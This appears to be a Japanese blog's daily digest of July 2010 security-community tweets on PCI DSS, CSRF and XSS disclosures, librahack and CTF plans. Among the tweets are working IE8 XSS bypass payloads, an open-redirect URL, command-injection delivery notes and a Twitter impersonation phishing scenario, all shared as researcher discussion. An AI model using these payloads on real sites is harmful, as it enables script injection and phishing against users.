hasegawayosuke: http://twitter.com/kimukou_26/statuses/18670510697 社長じゃない。現状、GPU向けコードは解析技術が確立していないという話なので海外に外注は関係ない。OSS云々は意味わからない。(とこっそりマジレス

テーマ : セキュリティ
ジャンル : コンピュータ

7月16日のtwitterセキュリティクラスタ

PCI DSS(Payment Card Industry Data Security Standard)というアメリカでよく採用されているらしいセキュリティ基準が改正されるということについて。
yumano: PCI DSS関連の仕様が秋くらいに一気に更新されるらしい。 #islsjp

yumano: 日本では普及がまだまだ。>PCI DSS 仕様は追いかけるけど、対象となるお客さんを持ってないから普及度合いとかあんまり興味ないんだよなぁ。 *YF*

marinedolf: @yumano PCIDSS 2.0 2010/10 ?

yumano: @marinedolf 2.0 2010/10公開 2011/1発効のようです。レビューが7~9月。リリースサイクルが3年に変更されるようです。#islsjp *YF*

ikepyon: @yumano PCIDSS自体日本じゃ普及しなさげですもんねぇ。対応できないところが多いし・・・

marinedolf: @yumano 3年ごとにメジャーバージョンUPってどうなんですかね…(滝汗)

yumano: 一方ISMSはダントツ。前、どっかでISMSの数が多い→日本市場のセキュリティ意識は高いという感じの資料を見て吹いた覚えがある RT @ikepyon: @yumano PCIDSS自体日本じゃ普及しなさげですもんねぇ。対応できないところが多いし・・・ *YF*

ikepyon: www日本のISMSはとることが目的のところ多いから・・・orz RT: @yumano: 一方ISMSはダントツ。前、どっかでISMSの数が多い→日本市場のセキュリティ意識は高いという感じの資料を見て吹いた覚えがある



そして、PCI DSSの基準を満たすにはWAFが必要だそうですよ。だからアメリカでWAFが普及しているんですね(ITホワイトボックスで聞いた)。だけど… というお話になっていきます。知っちゃいけないセキュリティ業界の裏側を見た気がします。
ikepyon: そういえば、アメリカじゃPCIDSSを満たすためにWAFが売れてるって数年前に聞いたなぁ。WAFが正しく設定されているかどうか、動いてるかどうか不明だけどw

ikepyon: ようは、WAFさえ入れておけばOKらしいw

vulcain: 違うよ。単純なXSSとSQLインジェクション的somethingは弾かないといけないらしいw RT @ikepyon ようは、WAFさえ入れておけばOKらしいw

ikepyon: おっかわったの?RT: @vulcain: 違うよ。単純なXSSとSQLインジェクション的somethingは弾かないといけないらしいw RT @ikepyon ようは、WAFさえ入れておけばOKらしいw

hir0_t: PCI準拠のために、WAFは入っているけどBlockしない設定で動かしているってのをどこかで聞いたことがあります。 QT @ikepyon: ようは、WAFさえ入れておけばOKらしいw

vulcain: PCIDSSの審査受けるときだけねw RT @ikepyon おっかわったの?RT: @vulcain: 違うよ。単純なXSSとSQLインジェクション的somethingは弾かないといけないらしいw RT @ikepyon ようは、WAFさえ入れておけばOKらしいw

ikepyon: @vulcain なるほど。そのときだけ動かしとけばいい訳ねw

hir0_t: @ntsuji 運用とか設定はQSA次第なんでしょうか。そもそもWAF自体の要件もないですし。

ntsuji: @hir0_t QSAがどこまで詳しくみるかとどこが審査するかというのが明暗を分けるということは現実としてあるような気がします。情報を保護することが目的だったはずなのに、審査に通ることが目的なものにしないようQSA以外のボクたちも心掛けないといけないなと思います。

ntsuji: @hir0_t WAFに限らず、検査なんかでもスキャナの結果をペネトレの結果です。と出されるケースもあるようです。色々なところで議論がなされてのバージョンアップをしているようなのでボクも次期バージョンを期待しています。

hir0_t: @ntsuji おっしゃるとおりです。10月にリリースされるPCI DSS次期バージョンで、もう少し基準が明確になるといいですね。

hir0_t: @ntsuji スキャナの結果=ペネトレの結果はひどいですね。要件11.2と11.3で分けている意味がない。



たまに見えるプロのお仕事の話は、興味深いですよね。そんなふうにテストしてるんだ、とか。
ymzkei5: お客さんからの要件で市販ツールを使ってWeb診断。普段使う自社ツールとちがって、マニアックな設定をしようとすると道に迷う。・・・なぜテスト除外をしたパラメータにHTMLタグとか送るんだ、こいつはw (Proxyをはさんで気に入らないリクエストをはじくしかないかなぁ。><)



ルートネームサーバーに続いて来年にはjpサーバーもDNSSECが運用されるそうですね。
bakera: [メモ] DNSSECはあんまり理解できていないのですが、そろそろ本格的に勉強しないと……。 http://japan.cnet.com/news/service/story/0,3800104747,20416930,00.htm



Try WiMAXのお話。うちも奧さんが使っているのですが、データのアップには時間がかかるらしく(イーモバではエラーがよく起こってた)光ほどの速度はないらしいですよ。それにしても壁が厚くてうらやましい限りです。うちは外と室内の気温が変わらないくらいだというのにw
takesako: Try WiMAX で15日間レンタルしてみたけど、自宅で余裕で繋がって嬉しい。無線LANルータもあるのでポケットWi-Fi的な使い方ができて、こりゃ便利だわ。 http://www.uqwimax.jp/service/trywimax/

kuroneko_stacy: @takesako 自宅で繋がるって羨ましいっ>< うちのマンションどれだけ壁厚いのかと…。

takesako: @kuroneko_stacy 期待してなかったので繋がってびっくりでした。レンタル専用機器はアンテナ1本ですけど、最近でたNECのATermとEgg無線ルータはアンテナが2本入ってるので、通りがよくなることもあるっぽいです。理論上は27階ぐらいの高さまではいけるそうです。

takesako: NEC Aterm WM3300R (WiMAX無線LANルータ) のレビューを見ると少し大きくてバッテリーの持ち時間が少ないみたい http://review.kakaku.com/review/K0000066280/

takesako: WiMAX対応モバイルWi-Fiルーター「egg」は今のところヤマダ電機とソフトアンドハードのMVNOにしか対応してないのか。無線LANのみの接続でUSB充電ケーブルは別売りらしい http://bit.ly/cG42ya



レンサバ屋さんがこうつぶやくと、リアルに怖いですね。ドメインも数あれば広告につながったりするのでしょうかね。
kunihirotanaka: バナーで「息子の名前にぴったりのドメインを探し中なう。○○ならドメインが100円で」とあった。ただ次年度以降は1,000円近く負担させられ、解約したら息子のドメイン跡地にローン、キャッシング、カジノ等の広告が並ぶ。格安ドメイン屋のビジネスモデルって解約後の広告収入だから怖い。



それでもいいので、たまには誰か仕事の声かけてください><
ymzkei5: RT @yumano: #memo 良いまとめ RT @kosaki55tea: ダメな仕事を受けないためのNGワード | おごちゃんの雑文 http://htn.to/bB4M6



HJといってもセキュリティに関係ある方のHJは動的なページはないので安心ですね。?\静的セキュリティ!/
ikepyon: あらら、HJハックされたのか http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2290

テーマ : セキュリティ
ジャンル : コンピュータ

7月15日のtwitterセキュリティクラスタ

今日は「ハッキングの達人」の発売日です。それとは関係ないですが面白そうな本があるらしく、それについてちょっと盛り上がってました。
hajikami: 会社にWebのバッドノウハウに関する本があるんだけど、SQLインジェクションの他に、 XSSやXSRFの具体例も書いていて凄く面白い。研修中、休みを作って読みふけってた

ockeghem: よろしければ書名を教えていただけないでしょうか RT @hajikami: 会社にWebのバッドノウハウに関する本があるんだけど、SQLインジェクションの他に、XSSやXSRF の具体例も書いていて凄く面白い。研修中、休みを作って読みふけってた

hajikami: 昨日読んでいた本は、『バグ攻略で極めるWeb開発のツボ 現場で必要不可欠なバッドノウハウ』です。初学者から中級者向けの本でした。 @ockeghem @hasegawayosuke

hasegawayosuke: .@sonodam @ockeghem なるほど、目次をみるとセキュリティの章もあるんですね。。 http://www.seshop.com/product/detail/10558/

ockeghem: @hasegawayosuke 買いかけたけど、このレビューを見たら躊躇している「バグ攻略で極めるWeb開発のツボ」 http://pc.bookmall.co.jp/search/review.php?code=20090624

hoshikuzu: .@ockeghem 私には結構面白いです、「バグ攻略で極めるWeb開発のツボ」。 どこかの図書館でのリソースリーク(だろう)の推測にも役立ったりしています。というか、この本であげられているカーソルリークの事例のまんまではないかと。



オープンリダイレクタについてのお話。自分のドメインで使われるとまずいですよね。
ucq: http://www.google.com/search?q=Open%20Redirect&btnI=I%26%2339;%69%6D%2B%46%65%65%6C%69%6E%67%2B%4C%75%63%6B%79

ucq: Open Redirectできるとおいしいの?

hasegawayosuke: @ucq ドメインによる。以前、microsoft.com 内のオープンリダイレクタがポルノサイトに利用されてる実例は見つけたことがある。そういうのは利用価値があるのでおいしい。(何この超マジレス

ucq: @hasegawayosuke やっぱりドメイン次第ですよね。GoogleのI'm Feeling Luckyが気になっていたのです。

mincemaker: アメリカならチラシかポスターにFacebookのCSRFコードを印刷しておくと何かできるのかもなあ。

hasegawayosuke: @ucq I'm Feeling Lucky 使った誘導は昔からありますね。 http://www.itmedia.co.jp/enterprise/articles/0711/06/news023.html



そろそろ本当にやってくるかもしれないIPv6のPingであるping6のお話。まあ、コマンドとは関係ないですが。
kinyuka: IPv6もpingくらい打てるようになるか… IPv6が必要だから勉強するのではなく  IPv6が有効になってしまっているホストを管理せねばならぬのでIPv6を勉強するこの悲しさよ

kinyuka: ping6じゃなくてpin6にするくらいのセンスが欲しかった

hasegawayosuke: 6uid にするくらいのセンスは行きすぎ。 RT @kinyuka: ping6じゃなくてpin6にするくらいのセンスが欲しかった

ucq: 文字を回転させるUnicode制御文字が必要だと考えられる



そして、Windowsのpathpingコマンドについて。Windows7やVistaって管理者権限で動かす、とかあって、たまに戸惑うことが多いですね。
ockeghem: Windowsにpathpingというコマンドがあるのを知った。さっそく動かしてみたら、「0 リソースがありません」という不思議なエラー。ググったところ、管理者権限で動かせばおkということで、やってみたら確かにそうだった



Mozilla Snifferっていう、名前だけ見ると食指が動きそうなアドオンですよ。知ってたら間違いなく入れてたような気がするので、なんとなくほっとしてます。
ymzkei5: ■Mozillaサイトに悪質なアドオン、パスワード流出の恐れ - ITmedia News http://www.itmedia.co.jp/news/articles/1007/15/news014.html


ヘタにコミュニケーションズなんか作られて、ぼっちがばれたり、片側だけから発信してるだけで誰からも返事がないのが知られると、すごい悲しい気分になると思います。
yumano: 悪用厳禁ツールっぽい雰囲気があるw RT @ripjyr: 「ネットいじめ」を防止するツールをKDDIが開発中、ネットでの友人関係を抽出し可視化 - http://bit.ly/aagyKJ



セキュリティの専門家にだって、法律の専門家にだって、大学教授にだって臆せず正論を投げかけられる俺、カコイイ! 俺理論は完璧なのです(キリッ と思ってらっしゃるのですかね。
Sikushima: @HiromitsuTakagi 私と同じく民事と刑事について拘ってた訳だから、当然分かってるよね。論文出さないと研究者として失格ですよ。税金で喰ってるのですから、捜査当局と同じ穴の狢ですし、研究者なら論文がなければ存在価値はない。期待しているよ。 #librahack


で、librahackと関係あるかどうかはわかりませんが、図書館のデータをSQLでスクレイピングですよ。
bakera: [メモ] スクレイピング対象のURLとか力強すぎる。 http://d.hatena.ne.jp/moriyoshi/20100714/1279085753



タダがけは男のロマンですが、やられた方はたまっちゃもんじゃないので、設定はちゃんとしましょう。
yumano: #memo SIP 攻撃 事例 SIP攻撃観測板。国際通信はできないように設定したほうがよさげ。 http://bbs.voip-info.jp/forum/index.php?forum=18



株を買ってみたのですが、IBMに吸収されたときに、それも買われていったなあという思い出が。
ikepyon: いつの間にかISS終了してたのか。昔は使ってたなぁ http://www-935.ibm.com/services/jp/index.wss/executivebrief/secpriv/b1334176?cntxt=b1333604

テーマ : セキュリティ
ジャンル : コンピュータ

7月14日のtwitterセキュリティクラスタ

梅雨と工事と下痢でなんかイヤな一日でしたが、今日はどうなるのでしょう。仕事は谷間でお金もありませんが、がんばって更新しますよ。


予想通りというか、あっという間にJSOC見学会は埋まってしまいました。やはりアカデミックパックのように学生になるライフハックを駆使するしかないのか…
ripjyr: キャンセル待ち! QT @ishikawa84g: ぎゃー乗り遅れたー RT: @ripjyr: JSOC見学会が、12時間立たずに埋まってしまった・・・



無線LANはアクセスポイントが面白いんじゃないかと思っている今日この頃ですが、詳しくは次号のハッカージャパンをご覧ください。
yumano: mobilepointという無線APを用意して、つないだら認証画面を表示するようにした場合、何かの犯罪にふれるのかなぁ・・・ もちろん、やらないですよ!!



そして、実験するには電波暗室ですが、以外とお高くて泣けてきます。
tessy_jp: やっぱりそっち系ねw いいお値段 http://bit.ly/9YKI1y RT @yousukezan: 電波暗室でならw RT @tessy_jp: 講師希望ということですねw RT @yousukezan: 無線LANセキュリティ勉強会とかないかなあ。



あと、簡易電波暗室というのもあるそうで、こちらは1万円くらいとがんばれば買えなくはなさそうなお値段です。
tessy_jp: 簡易電波暗室とかそういうのでもありかなあ? これだと遮断されるわけではないので微妙なのか > 自作簡易電波暗室・・・もとい、電波暗袋 <http://bit.ly/9ZrJjc



twitterは犯罪者のすくつ(なぜか変換できない)になりそうで怖いです><
expl01t: あるアカウントAと似たA'を新規登録→Aと同じアイコンを登録→つぶやきは非公開に設定→ 「裏アカウント始めました」と自己紹介欄に記載→AのフォローワーにA'からフォローしまくる→ある程度フォローされたところでA'の短縮URL付きつぶやきで悪いサイトに誘導 という攻撃シナリオを考えた



そしてlibrahack関連では、高木先生があきれモードです。
HiromitsuTakagi: プログラムやWebの成り立ちを何も知らない法曹こそ、日ごろどんなソフトウェアをどう使用しても危険の認識はなかったと言える。何も知らないのだから。その一方「プログラム開発に携わる者なら危険を認識していたはずだ」と法曹は言う。自分は無知という安全圏に立ちながら。 #librahack

HiromitsuTakagi: いいかげん、パソコンが使えるってだけで(プログラム開発に携わっていないのに)IT専門を名乗れる時代は終わってると思うんだ。(何度も頭に浮かびつつ口にしなかったことだが、やはりはっきりと言っていかなければならないと確信した。)



そして、(何度も頭に浮かびつつ口にしなかったことだが、やはりはっきりと言っていかなければならないと確信した。)は流行りそうな気がしたけど、長いのでダメですかね。
hasegawayosuke: この時間は眠くて何も頭に浮かばない。(何度も頭に浮かびつつ口にしなかったことだが、やはりはっきりと言っていかなければならないと確信した。)



書体をMSでないものにして、InDesignでベタ組みするだけで、それっぽく見えるんですけどね。そういや今の雑誌って組みは汚いですよ。
mincemaker: やっぱ組版はプロに任せないといかんなと最近増えてきた自作電子書籍を見ていて思うわ。俺北の人達はすごかったんだなあ。



IPAも仕分けを乗り切ったと思ったら… またまた来年も仕分け対象になりそうですな。
ripjyr: I'm reading now:最近のやられホストにIPAが含まれていた。 http://tomocha.net/diary/?201007b#201007142 うひゃぁ、IPAさん頼みますよ・・・



仮想マシンで動かす意義は特に感じないのですが、動かすのは面白そうなので。
nrglog: スマートカードのドライバ読み込ませたらちゃんとB-CAS使えた。ということで、ESXi上の仮想マシンで完璧にFriioが動作します(キリッ



自宅セキュリティに対抗する新たなセキュリティがいろいろです。暑くてみんなやる気がないのですね。わかります。
expl01t: [ac] 私も早退を切望してますが,全然無理orz RT: @tetsutalow すばらしい勢いで爽快セキュリティの輪が広がってゆく.今日は後は会議もないし私も早退セキュリティしたいな. QT @expl01t: \爽快セキュリティ!/ \早退セキュリティ!/

yumano: \ぼややんセキュリティ!/ RT @expl01t: [ac] クラウドセキュリティの研究は次のどちらがいいか悩み始めるなど \もやもやセキュリティ!/ \もこもこセキュリティ!/

expl01t: [ac] クラウドセキュリティの研究は次のどちらがいいか悩み始めるなど \もやもやセキュリティ!/ \もこもこセキュリティ!/

minakoneko: \ダラダラセキュリティ!/

expl01t: \ちょろまか爽快セキュリティ!/ ←これ絶対怒られるけど勢いで書く

expl01t: \脳内セキュリティ!/ RT: @minakoneko \ダラダラセキュリティ!/

テーマ : セキュリティ
ジャンル : コンピュータ

7月13日のtwitterセキュリティクラスタ

7月なのに涼しくて、うれしいような、びっくりするような、そんな天気です。今日も大雨降るのでしょうか。

そういえばこのブログも使わせていただいているfc2にCSRFがあるというお話。夕方には直ったんですね。twitterで言われればできるんだ。
kinugawamasato: @fc2info fc2ホームページのFTPパスワード変更機能はCSRFに脆弱です。これによりfc2にログイン状態のユーザに細工したページにアクセスさせることで「xxxxxx」など適当なFTPパスワードを設定させることができてしまいます。対策をお願いします。

kinugawamasato: fc2ホームページのFTPパスワードを変更できるCSRF脆弱性、4月頃はパスワードを「a」とかにできる状態だったけど今は「a」は無理で「aaaaaa」にできる状態まで改善しましたね…

kinugawamasato: .@fc2infoさん CSRFなおしたっぴ!とか言ってこないかな…

kinugawamasato: fc2ホームページのFTPパスワードを変更できるCSRF脆弱性、対策入りましたね! http://gyazo.com/c632f57010528327988d5362e3ce815a.png



自分のブログにコメントくれる超初心者と、twitterで見かけるプロと、セプキャンに行けるようなエリート学生とのレベルの違いを感じている今日この頃です。格差社会ですね。そんなわけで、最近お金と頭脳はないけどやる気だけはある人のレベルを引き上げる手助けができればいいなと思ってます。機会があればぜひ。
mincemaker: そういや今日は FirebugとかStylishの使い方の話が需要あったみたいだけど、その辺の話をヌルい勉強会でしたら需要あるのかねえ。

mincemaker: 下を見て満足していたら時間の無駄なので、底辺の底上げに努めるか高みを目指すかにしよう。僕は周りの皆みたいな高みには到達できないのは解っているのでそこは目指さないけど。



結局一度もまっちゃ445に行けてないのですが、参加してもいいのでしょうか。とはいえもう締め切られている可能性が高そうでしょうが。
ripjyr: まっちゃ445勉強会特別編JSOC見学会募集開始しました。興味ある方は是非!>http://matcha445.techtalk.jp/saturday-workshop/matcha445-jsoc-tour



ツールの紹介がいくつか。httpのトラフィックをロギングできるようです。
hasegawayosuke: これちょっと便利かも。 http://www.fiddlercap.com/FiddlerCap/


そして、Nikto。Niktoって昔はよく使われてましたが、さすがに今は仕事では使われないのでしょうか。
sen_u: 全国のNiktoファンのみなさん、アップデートでてますよ。 2010-07-11 Nikto 2.1.2 http://cirt.net/nikto2?quicktabs_1=2#quicktabs-1



ああ、昔からやってるオンラインスキャンサービスの名前をクラウドに変えて、新製品っぽくしただけなのですね。
ntsuji: アレな理由で気になっていたものを検証してくださっている方がいました。うーん。致命的にダメダメですね。名ばかりクラウドの典型ってところでしょうか。 Trend Micro HouseCall の クォリティが著しく低い件について - http://bit.ly/cpBBlT



pdfの脆弱性を突いた攻撃を防ぐために画像に変換して閲覧するという話。なんだかpdfの意義はほぼ失われてる気はしますが… そういや今もあるのかわかりませんが、はまちちゃんの作られた「予告.out」って書き込みが全部画像になりましたよね。
ntsuji: ドキュメントファイルは一旦画像に変換しちゃって閲覧するみたいな仕組みの製品ってないんでしょうか。 PDF攻撃を予防する為のベストプラクティス | NCSIRTアドバイザリ | 情報セキュリティのNRIセキュア - http://bit.ly/aZTwmR


ockeghem: 17年前にそういう製品作りましたが、時代を先取りし過ぎて、あまり売れないままディスコンに http://j.mp/9zF4Bq RT @ntsuji: ドキュメントファイルは一旦画像に変換しちゃって閲覧するみたいな仕組みの製品ってないんでしょうか。 PDF攻撃を予防する為のベスト

ntsuji: @ockeghem おぉ!案外身近にっ!これって色々なエディションがあるようですがHTTPなんかにに乗ってきたものも(プロクシ型GWアンチウイルスみたく動作して)変換する機能を持つものもあるんですか?

ntsuji: @ockeghem 発想すばらしいと思います。今の攻撃傾向ににあわせて閲覧方法そのものを変えてしまうことによって、HTML自体やFlash、ドキュメントファイルを利用したExploitationにかなり有効かもしれないですね。



守りたいものはネットから物理的に切り離すのがいちばんだと思いますが、そういうわけにもいかないんですかねえ。
Akira_Murakami: 情報漏えい対策を通じて「守るべきもの」とは - @IT http://www.atmarkit.co.jp/fsecurity/special/156dlp/dlp01.html



PowerShellとか年に1、2回しか使わないですが、メモメモ。
tomoki0sanaki: ①CmdInjection 可。②ASCII のみ。③cmd.exe /c echo 禁止。④PowerShell 可。⑤BITS 可。PowerShell で BITS を操作 → http://bit.ly/aFwwau



ぼくも賞金稼ぎしたいので、IPAはお金くれたらいいと思います。
ripjyr: I'm reading now:脆弱性情報に対する報酬は--セキュリティ研究者はどう振る舞うべきか http://japan.cnet.com/sp/zeroday/story/0,3800105600,20416719,00.htm



あんまりセキュリティとは関係ない気もしますが、ユースト中継をダンプする構文。セミナー中継とか多いですしね。
miuta: 【rtmpdump】千人超えるようなユーストの場合サーバーが変わって live.edgefcs.net:1935になる場合がある。その場合はストトラでも途切れずdl出来るが開始時間終了時間などを設定できるぽいとかバッチファイルでの利用法もあるため一応。その時の構文は↑

miuta: rtmpdump -q -v -r "rtmp://flashXX.ustream.tv:1935/ustreamVideo/XXX" -a "ustreamVideo/XXX" -f "LNX 10,0,45,2" -y "streams/live" -o "d:\x.flv"

miuta: 多分macでもいける思いますがわかりません。ちなみにrtmpdump-2.3フォルダをC ドライブ直下に置いて使用の場合コマンドプロンプト起動後cd \rtmpdump-2.3を貼り付けenterキー、以後構文を1行にして貼り付けenterで開始 終了はコマンドプロンプト終了でOK

miuta: 字数の関係で頭のrtmpdumpは省略しましたが、xは任意のファイル名 xxxはUSTのページ→埋め込み→ライブ番組の文字列の中のhttp://www.ustream.tv/flash/live/1/xxxの xxx部分(数字7文字) xxxxとxxは放送固有のアドレスです。

テーマ : セキュリティ
ジャンル : コンピュータ

7月12日のtwitterセキュリティクラスタ

週末にあったsmpCTFのまとめ記事です。そこからexploitmeを作る話が盛り上がっていきます。盛り上がったので長いです。海外だといろいろなジャンルのやられアプリケーションやサーバーが出ていますが、日本語の解説がないのでいろいろ大変なので、本当にできたらいいなあ。
doiphin: smpCTFのまとめ記事書いた。時間かけすぎた。 http://d.hatena.ne.jp/Dltn/20100712/1278911653

ucq: おい、chg1解けなかったのはバグのせいだったのかよw 問題の取得まで自動化したのに・・・

ucq: Exploitの解説って需要あるのか。

doiphin: @ucq exploitme みたいなものがあると面白そう。 @eagle0wl さんのcrackmeのように。

eagle0wl: @doiphin 実は企画中です。何年も前からw RT @ucq exploitme みたいなものがあると面白そう。 @eagle0wl さんのcrackmeのように。

doiphin: わーーー!!これは楽しみすぎます・・・(///) QT @eagle0wl: @doiphin 実は企画中です。何年も前からw RT @ucq exploitme みたいなものがあると面白そう。 @eagle0wl さんのcrackmeのように。

eagle0wl: 海外ではバラバラのexeファイルを組み立てたり、動作しないアプリを無理やり動かすよう改造させる ReverseMe とかあるんですけどね。やはり日本から出るというのが重要なのかしら。 @doiphin @ucq

doiphin: @eagle0wl そんな面白そうなものがあるんですね・・知りませんでした。ググってきます!

doiphin: 世の中は思っている以上に面白い事で溢れてて、寝る暇も惜しみたくなってしまう。要するにレポート溜まりすぎてる。

eagle0wl: 自分が今まで出したcrackmeは初心者向けにすべく全部MASM(フルアセンブラ)で書き起こしたものなんだけど、ExploitMe も高級言語で作らんといかんかもね。アセンブリ言語で作るのめんどいし。 @doiphin @ucq

eagle0wl: 自分は仕事柄リバースエンジニアリングに関わっているとはいえ、Exploit を作る必要性に迫られたことは一度も無いので、正直いい ExploitMe を作れるか不安です。とはいえ、CrackMe を作った当時、C言語もろくに書けなかったのは今だから言える事実w

eagle0wl: @ucq 当時学生だったからフルアセンブリでも嬉々として書けたけど、さすがに今古アセンブリでやれと言われるとキツいです(笑)

ucq: @eagle0wl アセンブリ言語で書くのは確かにめんどうですね。あと対象とするOSもどれにするか決めないといけませんね。

ucq: @eagle0wl いいですね。日本から出た方が気軽に取り込めると思うのでそういうのも大事だと思います。

yumano: ガラっ!! 同じくちょっと待ってねw RT @eagle0wl: @doiphin 実は企画中です。何年も前からw RT @ucq exploitme みたいなものがあると面白そう。 @eagle0wl さんのcrackmeのように。

ucq: @eagle0wl 自分もシェルコードくらいまでが限界です(笑) 最近はスクリプト言語に慣れてしまいC言語もちょっと怪しくなってきました(笑)

yumano: 正解のご褒美に( ゚∀゚)o彡゚ ○っぱい!○っぱい! RT @hasegawayosuke: イーグルさんがこういうの作ってくれると聞いて。 http://d.hatena.ne.jp/aike/20100709



そこから話は飛んで、バイナリ組の贅沢な楽しみ方について。
hasegawayosuke: 世の中には、他人の書いた意味不明なコードのデバッグで泣いてる開発者がたくさんいるというのに、その一方で好き好んでバイナリしかない他人のコードをデバッガで追いかけることに喜びを感じるバイナリ組。贅沢な楽しみ方ですね。

hasegawayosuke: 難読化JSを読み解くほうが、jQueryバリバリなJS読むより楽しい、という感覚といっしょなのかな。RT @doiphin: @hasegawayosuke 今となっては、C言語等を読むよりもむしろデバッガでアセンブラを読む方が落ち着いて楽しく読めますね。

eagle0wl: 壁は高いほど登りがいがあるし、硬いほど破りがいがある。アセンブリはプリミティブな所が美しいので、それとは違った楽しさかも RT @doiphin: @hasegawayosuke 今となっては、C言語等を読むよりもむしろデバッガでアセンブラを読む方が落ち着いて楽しく読めますね。



細かいバイナリは気にするのに、ドメインや製品名の細かい違いは気にしない会社、ネットエージェントについて。
ockeghem: ネットエージェントブログは、どうしてnetagent.co.jpのサブドメインでやらないんだろう。『当ブログはあくまで一個人の視点で書かれており、記事の内容についてはネットエージェント株式会社の公式見解とは異なる場合があります』ということを強調したい?

hasegawayosuke: それ以前に文字コードおかしくね?w (恥 RT @kyo_ago: ネットエージェントも技術ブログ始めてた。どうでも良いけど、#nav08 a[href]はこのページのlocalhost.hrefだとおもう http://www.netagent-blog.jp/

ockeghem: アズジェント(asgent)という会社があるのだから、ネタジェント(netagent)という会社があってもいいと思うんだ

hasegawayosuke: 刷り上がった名刺が natagent になってたという逸話があります。

ymzkei5: 「PACKET BLACK HOLE」のスペルが間違っている名刺を見たことがありますw (luminさんが配ってたw) RT @hasegawayosuke: 刷り上がった名刺が natagent になってたという逸話があります。



twitterのin_reply_toの話。セキュリティ系以外の人でも気にしてる人は少なそうです。
mincemaker: セキュリティ系の人はTwitterの in reply to に慣れていない説。

mincemaker: 非公式RTで元発言のURLが改竄されてるとかありえない。

hasegawayosuke: in_reply_to とか気にしてない。

hasegawayosuke: 非公式RTで元発言改ざんを気にする人は、MLでも全文引用派という説はどうか。



IT系の男は要注意というか、自分が注意しろよって話ですが。
hostess: 元同僚のAちゃんは、元カレが設定したパソコンのせいでずっとメール盗み見されてたし、銀座の Mちゃんは「パスワードはぜんぶ誕生日にしてる」ってのを覚えてた客に携帯メールのプライバシーぜんぶ2チャンに書き込まれたし・・ホステスの間では、 IT系の男は要注意というイメージ。



サポートが終わってもXSSはまだまだ出てきて、逆にすごいなあというかんじですね。
hoshikuzu: ・・・とりあえず、IE6 と IE7 は、Internet XSSplorer。


そして話に追いつけてませんがIE8のXSSっぽい話。だれか補完してくれないかなあ。
hasegawayosuke: .@0x6D6172696F Cool!! not only img also input too. <input type=text value="x` `<script>alert(/Internet XSSplorer/.source)</script>"` `>

hasegawayosuke: more shortly <img src="<script>alert(1)</script>`" `> via @_bun_

hasegawayosuke: shortest? <img src="<script>alert(1)</script>" `> also via @_bun_

hoshikuzu: やっと話に追いついた。 <img src="http://www.google.com/images/logos/logo.gif" alt="<s>test1</s>" `><s>test2</s> うーん。うーん。うーん。

hoshikuzu: @hoshikuzu 本当は、alt属性の値は、は文字参照しなくていいはずなんだけど。SGML的にはRCDATAだから。 という斜めにはずれたほげほげー。

hoshikuzu: この化け物め。 <img alt="<script>alert(1)</script>" <!-- ` --> >

ockeghem: .@hoshikuzu alt属性のスクリプトって動くのですか?

hoshikuzu: .@ockeghem いえ、これは、alt属性になっていないっす。IE8では。script要素が裸で誕生ですね。` のゴミのせいで。詳しくは@hasegawayosuke さんに。

hoshikuzu: @ockeghem http://jsbin.com/uyezu3

hoshikuzu: .@ockeghem IE8の開発者ツールでみてやると、何がおきていたのかわかりやすいです。

hasegawayosuke: <img src="x' '<script>alert(1)</script>"' '> // no need accent grave (`)



読もう。その1
nca_gr_jp: 「最新セキュリティ超入門 増補改訂版」発売。 NCAが執筆協力した「CSIRT奮闘記」が全回載っています。 http://ec.nikkeibp.co.jp/item/books/187030.html


読もう。その2
jpcert: こんにちは。サイバークリーンセンターの5月度活動実績が公開されてます。 CCCクリーナーからの分析グラフも。^AM  https://www.ccc.go.jp/report/201005/1005monthly.html

テーマ : セキュリティ
ジャンル : コンピュータ

7月9日のtwitterセキュリティクラスタ

librahackは相変わらず盛り上がってますが、某社長さんがフルボッコにされてる池乃めだか状態でかわいそうですね。会社、大丈夫なのでしょうか。印象的なのを少し。

monjudoh: #librahack ハッシュタグ付けて再投稿 『多分違う。「SIerが技術力不足なのが100%悪い」(→「啓蒙が必要」?→「俺がやるます」?)みたいのをどうしても主張したくて、SIerの技術力不足をすべての原因にするためには警察は悪くないことにしなきゃいけないので、』

bulkneets: 俺が法的なこと差し置いて書くようにしてるのは用語の使い方とかで重箱の隅つつかれて、それが原因で技術的に正しい部分まで間違ってると誤読されるのが嫌だから。



そういや運用を止めずに本番環境をザクザク修正してるサイトがあってびっくりしました。テストが不十分で、とりあえず何とかしようとしているだけだから、修正抜けが多いんだと思いますよ。
tomoki0sanaki: 現状バグがあるのでサイト停止中というのも "アリ" にする風土を作っていく必要があるのかも RT @bulkneets 現状バグがあるんでバグが直るまでクロール遠慮してくれというのも別段おかしくない



偉そうなことをほざく前に、いいから早く直してもらいたいものです。テストでリンクすらクリックしないのでしょうかね。まったく。o(`ω´*)oプンスカプンスカ!!
todesking: まだ直ってない http://twitter.com/todesking/status/18103319170



そして、関係はそれほどないですが、XSS関連。
ockeghem: そういえば、たまに属性名を動的生成できるサイトがあって、XSSが起こる場合があるのですよね。name="value"のnameの方ね。これは説明してないんだけど、どうするかなぁ

M1n0x: XSSed。皮算用なGoogleハック的には範囲約7万件?。細かいことは後で調べるとして・・・。一応後で報告しとくか・・・。

M1n0x: 発見:パストラバーサル&XSS 対象:某大学研究室サイト内の検索機能とダウンロード機能 対応:報告済み 詳細:やばめ。



短い原稿で説明しようと思うとどうしても抜けが出てくるものなので、Webらしくアップトゥデートに修正すればいいと思いますが、修正に金も手間もかかるからか、メンテナンスされないんですよね。
ockeghem: セキュア・プログラミング講座のscript要素のXSS対策、修正されていた。http://j.mp/czvFHx 修正前魚拓: http://j.mp/9Ewc0m 違いわかりますか?

hasegawayosuke: IPA ISECセキュアプログラミング講座の http://j.mp/czvFHx は、属性値を引用符で囲め、という記述が見当たりませんね。これだと簡単に貫通します



いよいよ、セプキャンも参加者が決まって、活発になってきました。僕も参加したくなってきましたが、ハッシュタグ見てると申し込んでも普通に書類で落とされたようなレベルの高さですね。
hasegawayosuke: 「 #spcamp 」みてたらおれも参加したくなってきた


レベル高い参加者の例。
ucq: ブログ書いた。 記号だけでErlangプログラミング http://bit.ly/bmcCum



ホームガードエバンジェリストとかマイハウスセキュリティエバンジェリストとか名乗ってうらやましがられたいです。あと、主任自宅警備研究員。
